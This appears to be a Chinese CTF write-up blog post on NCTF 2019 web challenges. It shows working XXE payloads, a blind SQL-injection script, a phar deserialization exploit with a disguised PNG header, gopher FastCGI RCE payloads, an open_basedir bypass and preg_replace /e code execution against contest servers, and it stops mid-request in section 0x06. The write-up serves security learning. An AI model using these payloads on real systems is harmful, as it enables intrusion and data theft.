Eki's blog Eki's blog
Home
  • Library

    • PHP
    • JAVA
    • Node
    • Python
  • Contest

    • D3CTF 2021 Write Up
    • 虎符CTF2021
    • 2021 红帽 Web Write Up
  • Problem Set

    • Ethernaut Write Up
Pentest
Develop
  • Friends
About
  • Website
  • Tools
  • Categories
  • Tags
  • Archives
GitHub (opens new window)

Eki

Dreamer of Dreams
Home
  • Library

    • PHP
    • JAVA
    • Node
    • Python
  • Contest

    • D3CTF 2021 Write Up
    • 虎符CTF2021
    • 2021 红帽 Web Write Up
  • Problem Set

    • Ethernaut Write Up
Pentest
Develop
  • Friends
About
  • Website
  • Tools
  • Categories
  • Tags
  • Archives
GitHub (opens new window)
  • NCTF 游记

    • 0x00 前言
      • 0x01 Fake XML cookbook
        • 0x02 True XML cookbook
          • 0x03 SQLi (赛后复现)
            • 0x04 phar matches everything (赛后复现)
              • 0x05 easyphp
                • 0x06 replace
                  • 0x07 flask
                    • 0x08 Upload your Shell
                      • 0x09 flask_website
                        • 0x0A simple_xss
                          • 0x0B hacker_backdoor
                            • 0x0C tsb
                              • 0x0D 难看的代码
                                • 0x0E 签到题
                                  • 0x0F DEBUG
                                    • 0x10 Our 16bit Games
                                      • 0x11 Easy Ternary
                                        • 0x12 你大概需要一个带bar的mac
                                          • 0x13 math_easy
                                            • 0x14 hello_pwn
                                              • 0x15 pwn me 100 years! (I)
                                                • 0x16 pwn me 100 years! (II)
                                                  • 0x17 ~ 0x1C(pwn)
                                                    • 0x1D Keyboard
                                                      • 0x1E~0x21 (Crypto)
                                                        • 0x22 agoodidea
                                                          • 0x23 Become a Rockstar
                                                            • 0x24 Bright Body I
                                                              • 0x25 有内鬼,终止交易
                                                                • 0x26 小狗的秘密
                                                                  • 0x27 键盘侠
                                                                    • 0x28 What's this
                                                                      • 0x29 2077
                                                                        • 0x2A pip install
                                                                        Eki
                                                                        2021-05-06
                                                                        CTF Contest
                                                                        目录

                                                                        NCTF 游记

                                                                        # NCTF 游记

                                                                        # 0x00 前言

                                                                        又是一场被大佬出的“入门新手基础水题”虐爆的比赛。。。。。。。

                                                                        pwn2和流量分析做的心态爆炸。。。。导致正常比赛下来都没做出啥题(其实是菜。。。。。。

                                                                        最终盗版战队止步前十。。。。天璇的其他大佬都好强啊!(群除我佬。。。。)

                                                                        收货:

                                                                        • XEE攻击基本方法
                                                                        • linux 系统中一些敏感文件及其作用
                                                                        • 利用PIL写绘图脚本
                                                                        • chr().拼接字符串绕过引号限制
                                                                        • Wireshark 基本过滤操作的语法
                                                                        • SSRF 攻击

                                                                        Todo:

                                                                        • XXS 攻击的具体操作和原理
                                                                        • PIE 保护情况下基址的泄露方法和64位按字节写入的操作。。。。。。。。
                                                                        • 一堆pwn的知识点 rop heap........
                                                                        • Crypto密码学相关知识 RSA AES.......
                                                                        • 逆向patch.....

                                                                        # 0x01 Fake XML cookbook

                                                                        F12看了一眼发现

                                                                        function doLogin(){
                                                                        	var username = $("#username").val();
                                                                        	var password = $("#password").val();
                                                                        	if(username == "" || password == ""){
                                                                        		alert("Please enter the username and password!");
                                                                        		return;
                                                                        	}
                                                                        	
                                                                        	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
                                                                            $.ajax({
                                                                                type: "POST",
                                                                                url: "doLogin.php",
                                                                                contentType: "application/xml;charset=utf-8",
                                                                                data: data,
                                                                                dataType: "xml",
                                                                                anysc: false,
                                                                                success: function (result) {
                                                                                	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
                                                                                	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
                                                                                	if(code == "0"){
                                                                                		$(".msg").text(msg + " login fail!");
                                                                                	}else if(code == "1"){
                                                                                		$(".msg").text(msg + " login success!");
                                                                                	}else{
                                                                                		$(".msg").text("error:" + msg);
                                                                                	}
                                                                                },
                                                                                error: function (XMLHttpRequest,textStatus,errorThrown) {
                                                                                    $(".msg").text(errorThrown + ':' + textStatus);
                                                                                }
                                                                            }); 
                                                                        }
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16
                                                                        17
                                                                        18
                                                                        19
                                                                        20
                                                                        21
                                                                        22
                                                                        23
                                                                        24
                                                                        25
                                                                        26
                                                                        27
                                                                        28
                                                                        29
                                                                        30
                                                                        31
                                                                        32

                                                                        用XML和服务器通讯,联想到XXE攻击

                                                                        burp抓post包得到

                                                                        POST /doLogin.php HTTP/1.1
                                                                        Host: nctf2019.x1ct34m.com:40002
                                                                        Content-Length: 207
                                                                        Accept: application/xml, text/xml, */*; q=0.01
                                                                        Origin: http://nctf2019.x1ct34m.com:40002
                                                                        X-Requested-With: XMLHttpRequest
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
                                                                        DNT: 1
                                                                        Content-Type: application/xml;charset=UTF-8
                                                                        Referer: http://nctf2019.x1ct34m.com:40003/
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
                                                                        Connection: close
                                                                        
                                                                        <user><username>admin</username><password>123</password></user>
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15

                                                                        根据js脚本可以发现username是可以回显的

                                                                        然后构造一下exp

                                                                        POST /doLogin.php HTTP/1.1
                                                                        Host: nctf2019.x1ct34m.com:40002
                                                                        Content-Length: 207
                                                                        Accept: application/xml, text/xml, */*; q=0.01
                                                                        Origin: http://nctf2019.x1ct34m.com:40002
                                                                        X-Requested-With: XMLHttpRequest
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
                                                                        DNT: 1
                                                                        Content-Type: application/xml;charset=UTF-8
                                                                        Referer: http://nctf2019.x1ct34m.com:40003/
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
                                                                        Connection: close
                                                                        
                                                                        <?xml version="1.0" encoding="UTF-8"?>
                                                                        <!DOCTYPE foo [
                                                                         <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
                                                                         ]>
                                                                        
                                                                        <user><username>&xxe;</username><password>123</password></user>
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16
                                                                        17
                                                                        18
                                                                        19
                                                                        20

                                                                        # 0x02 True XML cookbook

                                                                        相当于第一题的加强版本

                                                                        现在/flag里东西没了

                                                                        看题目描述一开始以为要用上phar之类的骚操作,但是没有其他上传点了

                                                                        fuzz读了一下 /var/www/html/doLogin.php

                                                                        倒是有admin的密码了。。。

                                                                        但是没啥用

                                                                        读了/bin/sh 居然是有的。。。。

                                                                        再读了读/etc/hosts 和/proc/net/arp

                                                                        内网ip泄露

                                                                        127.0.0.1	localhost
                                                                        ::1	localhost ip6-localhost ip6-loopback
                                                                        fe00::0	ip6-localnet
                                                                        ff00::0	ip6-mcastprefix
                                                                        ff02::1	ip6-allnodes
                                                                        ff02::2	ip6-allrouters
                                                                        172.18.0.2	3b6bacb4719b
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        IP address       HW type     Flags       HW address            Mask     Device
                                                                        192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.75     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.55     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.16     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.63     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.249    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.24     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.39     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.70     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.47     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.8      0x1         0x2         02:42:c0:a8:01:08     *        eth0
                                                                        192.168.1.244    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.23     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.50     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.252    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.31     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.58     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.69     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.7      0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.34     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.15     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.42     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.49     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.243    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.18     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.57     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.251    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.26     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.33     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.64     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.2      0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.41     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.72     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.10     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.52     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.246    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.17     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.60     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.254    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.25     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.36     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.71     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.1      0x1         0x2         02:42:ea:57:7a:1c     *        eth0
                                                                        192.168.1.44     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.9      0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.245    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.20     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.51     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.253    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.28     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.59     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.4      0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.35     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.66     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.12     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.43     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.74     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.54     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.19     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.62     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.248    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.27     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.38     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.65     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.3      0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.46     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.73     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.11     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.53     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.247    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.22     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.61     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.30     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.37     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.68     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.6      0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.45     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.76     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.14     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.21     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.48     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.242    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.29     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.56     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.250    0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.5      0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.32     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.67     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        192.168.1.13     0x1         0x0         00:00:00:00:00:00     *        eth0
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16
                                                                        17
                                                                        18
                                                                        19
                                                                        20
                                                                        21
                                                                        22
                                                                        23
                                                                        24
                                                                        25
                                                                        26
                                                                        27
                                                                        28
                                                                        29
                                                                        30
                                                                        31
                                                                        32
                                                                        33
                                                                        34
                                                                        35
                                                                        36
                                                                        37
                                                                        38
                                                                        39
                                                                        40
                                                                        41
                                                                        42
                                                                        43
                                                                        44
                                                                        45
                                                                        46
                                                                        47
                                                                        48
                                                                        49
                                                                        50
                                                                        51
                                                                        52
                                                                        53
                                                                        54
                                                                        55
                                                                        56
                                                                        57
                                                                        58
                                                                        59
                                                                        60
                                                                        61
                                                                        62
                                                                        63
                                                                        64
                                                                        65
                                                                        66
                                                                        67
                                                                        68
                                                                        69
                                                                        70
                                                                        71
                                                                        72
                                                                        73
                                                                        74
                                                                        75
                                                                        76
                                                                        77
                                                                        78
                                                                        79
                                                                        80
                                                                        81
                                                                        82
                                                                        83
                                                                        84
                                                                        85
                                                                        86
                                                                        87
                                                                        88
                                                                        89
                                                                        90
                                                                        91

                                                                        SSRF Burp Suite Introuder 爆破

                                                                        192.168.1.8出了flag.....

                                                                        POST /doLogin.php HTTP/1.1
                                                                        Host: nctf2019.x1ct34m.com:40003
                                                                        Content-Length: 220
                                                                        Accept: application/xml, text/xml, */*; q=0.01
                                                                        Origin: http://nctf2019.x1ct34m.com:40003
                                                                        X-Requested-With: XMLHttpRequest
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
                                                                        DNT: 1
                                                                        Content-Type: application/xml;charset=UTF-8
                                                                        Referer: http://nctf2019.x1ct34m.com:40003/
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
                                                                        Connection: close
                                                                        
                                                                        <?xml version="1.0" encoding="UTF-8"?>
                                                                        <!DOCTYPE foo [
                                                                         <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://192.168.1.8">
                                                                         ]>
                                                                        
                                                                        <user><username>&xxe;</username><password>123</password></user>
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16
                                                                        17
                                                                        18
                                                                        19
                                                                        20

                                                                        # 0x03 SQLi (赛后复现)

                                                                        直接给了sql语句

                                                                        select * from users where username='' and passwd=''
                                                                        
                                                                        1

                                                                        但是过滤了一堆select . or ' like基本都过滤了

                                                                        然后这里的bypass技巧是

                                                                        单引号可以使用\来转义绕过,or可以采用|| =可以采用regexp,#可以用``\x00`替代

                                                                        然后基本上么得跨表查询,就只能盲注爆破password了

                                                                        exp 核心代码部分

                                                                        def boolequ(start,end):
                                                                            ret=""
                                                                            for i in range(start,end):
                                                                                for ch in pt:
                                                                                    payload="""||passwd/**/REGEXP/**/"^{}";\x00""".format(ret+ch)
                                                                                    data = {
                                                                                        "username":'\\',
                                                                                        "passwd":payload
                                                                                    }
                                                                                    #print data
                                                                                    req=requests.post(url,data=data,allow_redirects=False)
                                                                                    if req.status_code!=200 and req.status_code!=302:
                                                                                        continue 
                                                                                    if req.status_code==302:
                                                                                        ret=ret+ch
                                                                                        sys.stdout.write("[-]Result : -> {0} <-\r".format(ret))
                                                                                        sys.stdout.flush()
                                                                                        break
                                                                            print("[+]Result : ->"+ret+"<-")
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16
                                                                        17
                                                                        18
                                                                        19

                                                                        # 0x04 phar matches everything (赛后复现)

                                                                        ...原题可以拿到源码,但似乎buuoj上不行

                                                                        能拿到的源码是cathmine.php

                                                                        <?php
                                                                        class Easytest{
                                                                            protected $test;
                                                                            public function funny_get(){
                                                                                return $this->test;
                                                                            }
                                                                        }
                                                                        class Main {
                                                                            public $url;
                                                                            public function curl($url){
                                                                                $ch = curl_init();  
                                                                                curl_setopt($ch,CURLOPT_URL,$url);
                                                                                curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
                                                                                $output=curl_exec($ch);
                                                                                curl_close($ch);
                                                                                return $output;
                                                                            }
                                                                        
                                                                        	public function __destruct(){
                                                                                $this_is_a_easy_test=unserialize($_GET['careful']);
                                                                                if($this_is_a_easy_test->funny_get() === '1'){
                                                                                    echo $this->curl($this->url);
                                                                                }
                                                                            }    
                                                                        }
                                                                        
                                                                        if(isset($_POST["submit"])) {
                                                                            $check = getimagesize($_POST['name']);
                                                                            if($check !== false) {
                                                                                echo "File is an image - " . $check["mime"] . ".";
                                                                            } else {
                                                                                echo "File is not an image.";
                                                                            }
                                                                        }
                                                                        ?>
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16
                                                                        17
                                                                        18
                                                                        19
                                                                        20
                                                                        21
                                                                        22
                                                                        23
                                                                        24
                                                                        25
                                                                        26
                                                                        27
                                                                        28
                                                                        29
                                                                        30
                                                                        31
                                                                        32
                                                                        33
                                                                        34
                                                                        35

                                                                        这里藏了一个ssrf 但是不能直接用这个php打,因为url不可控

                                                                        判断文件类型使用了getimageinfo,所以可以搞phar的反序列化,这里很明显要我们SSRF,首先读下file:///proc/net/arp

                                                                        Exp

                                                                        <?php
                                                                        class Easytest{
                                                                            protected $test='1';
                                                                            public function funny_get(){
                                                                                return $this->test;
                                                                            }
                                                                        }
                                                                        class Main {
                                                                            public $url;
                                                                        }
                                                                        
                                                                        
                                                                        $test = new EasyTest;
                                                                        echo urlencode(serialize($test))."\n";
                                                                        
                                                                        $payload = new Main;
                                                                        $payload->url = "file:///proc/net/arp";
                                                                        
                                                                        $png_header = hex2bin('89504e470d0a1a0a0000000d49484452000000400000004000');
                                                                        $phar = new Phar('exp.phar');
                                                                        $phar -> startBuffering();
                                                                        $phar -> setStub($png_header.'<?php __HALT_COMPILER();?>');   //设置 stub,增加 gif 文件头
                                                                        $phar -> addFromString('test.txt','test');  //添加要压缩的文件
                                                                        $phar -> setMetadata($payload);  //将自定义 meta-data 存入 manifest
                                                                        $phar -> stopBuffering();
                                                                        rename("exp.phar","exp.png");
                                                                        
                                                                        ?>
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16
                                                                        17
                                                                        18
                                                                        19
                                                                        20
                                                                        21
                                                                        22
                                                                        23
                                                                        24
                                                                        25
                                                                        26
                                                                        27
                                                                        28

                                                                        拿到

                                                                        IP address       HW type     Flags       HW address            Mask     Device
                                                                        173.236.149.2    0x1         0x2         02:42:ad:ec:95:02     *        eth0
                                                                        
                                                                        1
                                                                        2

                                                                        /etc/host 拿到

                                                                        127.0.0.1	localhost
                                                                        ::1	localhost ip6-localhost ip6-loopback
                                                                        fe00::0	ip6-localnet
                                                                        ff00::0	ip6-mcastprefix
                                                                        ff02::1	ip6-allnodes
                                                                        ff02::2	ip6-allrouters
                                                                        173.236.149.9	osrc
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7

                                                                        但是都么得回显,后来发现是173.236.149.10这个(估计是buuoj的镜像问题

                                                                        然后访问一下显示

                                                                        这里用evoa师傅的脚本打

                                                                        python gopher.srff.exp.py -c "<?php phpinfo();?>" 173.236.149.10 /var/www/html/index.php
                                                                        gopher://127.0.0.1:9000/_%01%01%005%00%08%00%00%00%01%00%00%00%00%00%00%01%04%005%01%DB%00%00%0E%02CONTENT_LENGTH18%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%005%00%00%00%00%01%05%005%00%12%00%00%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%01%05%005%00%00%00%00
                                                                        
                                                                        1
                                                                        2

                                                                        替换成

                                                                        gopher://173.236.149.10:9000/_%01%01%005%00%08%00%00%00%01%00%00%00%00%00%00%01%04%005%01%DB%00%00%0E%02CONTENT_LENGTH18%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%005%00%00%00%00%01%05%005%00%12%00%00%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%01%05%005%00%00%00%00
                                                                        
                                                                        1

                                                                        可以看到有open_basedir /var/www/html:/tmp

                                                                        用一个经典的绕过方式

                                                                        mkdir('eki');chdir('eki');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));
                                                                        
                                                                        1
                                                                        python gopher.srff.exp.py -c "<?php mkdir('eki');chdir('eki');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));?>" 173.236.149.10 /var/www/html/index.php
                                                                        
                                                                        gopher://127.0.0.1:9000/_%01%01z%BF%00%08%00%00%00%01%00%00%00%00%00%00%01%04z%BF%01%DC%00%00%0E%03CONTENT_LENGTH171%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04z%BF%00%00%00%00%01%05z%BF%00%AB%00%00%3C%3Fphp%20mkdir%28%27eki%27%29%3Bchdir%28%27eki%27%29%3Bini_set%28%27open_basedir%27%2C%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bini_set%28%27open_basedir%27%2C%27/%27%29%3Becho%28file_get_contents%28%27flag%27%29%29%3B%3F%3E%01%05z%BF%00%00%00%00`
                                                                        
                                                                        1
                                                                        2
                                                                        3

                                                                        # 0x05 easyphp

                                                                        大佬队友带我躺赢。。。。。

                                                                        # 0x06 replace

                                                                        填三个"#"报错

                                                                        Parse error: syntax error, unexpected end of file in /var/www/html/index.php(70) : regexp code on line 1
                                                                        
                                                                        Fatal error: preg_replace(): Failed evaluating code: # in /var/www/html/index.php on line 70
                                                                        
                                                                        1
                                                                        2
                                                                        3

                                                                        实现功能使用的是preg_match()

                                                                        题目提示用了php5.6

                                                                        想到preg_match() /e参数

                                                                        试一下可以执行phpinfo()

                                                                        POST /index.php HTTP/1.1
                                                                        Host: nctf2019.x1ct34m.com:40006
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
                                                                        Accept-Encoding: gzip, deflate
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 72
                                                                        Origin: http://nctf2019.x1ct34m.com:40006
                                                                        Connection: close
                                                                        Referer: http://nctf2019.x1ct34m.com:40006/index.php
                                                                        Cookie: PHPSESSID=6vtpnnca8f9mjjde768sqiub4g
                                                                        Upgrade-Insecure-Requests: 1
                                                                        
                                                                        sub=text&pat=e&rep=phpinfo();
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15

                                                                        但是直接用readfile('/flag')读文件,发现单引号双引号被拦截

                                                                        于是用chr()拼接表示字符串。。。。。

                                                                        POST /index.php HTTP/1.1
                                                                        Host: nctf2019.x1ct34m.com:40006
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
                                                                        Accept-Encoding: gzip, deflate
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 72
                                                                        Origin: http://nctf2019.x1ct34m.com:40006
                                                                        Connection: close
                                                                        Referer: http://nctf2019.x1ct34m.com:40006/index.php
                                                                        Cookie: PHPSESSID=6vtpnnca8f9mjjde768sqiub4g
                                                                        Upgrade-Insecure-Requests: 1
                                                                        
